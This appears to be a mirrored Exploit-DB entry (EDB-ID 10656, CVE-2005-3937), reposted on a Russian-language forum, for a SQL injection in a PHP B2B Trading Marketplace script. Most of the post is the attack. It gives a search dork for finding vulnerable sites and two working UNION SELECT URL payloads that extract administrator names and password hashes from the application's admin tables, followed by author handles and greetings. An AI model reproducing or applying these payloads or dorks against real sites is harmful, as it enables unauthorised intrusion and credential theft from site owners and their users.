- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10656
- Проверка EDB
-
- Пройдено
- Автор
- ANGRY BOY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-3937
- Дата публикации
- 2009-12-25
Код:
[+] B2B Trading Marketplace SQL Injection Vulnerability
[+] Software : B2B Trading Marketplace Script
[+] Author : AnGrY BoY
[+] Contact : [email protected] & [email protected]
[+] Home : http://www.kurd-security.com http://www.h4kurd.com
=====================================================================================
[+] Dork : cat_sell.php?cid= or selloffers.php?cid=
[+]expolit:
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--
or
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--
[+] example
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members- Источник
- www.exploit-db.com
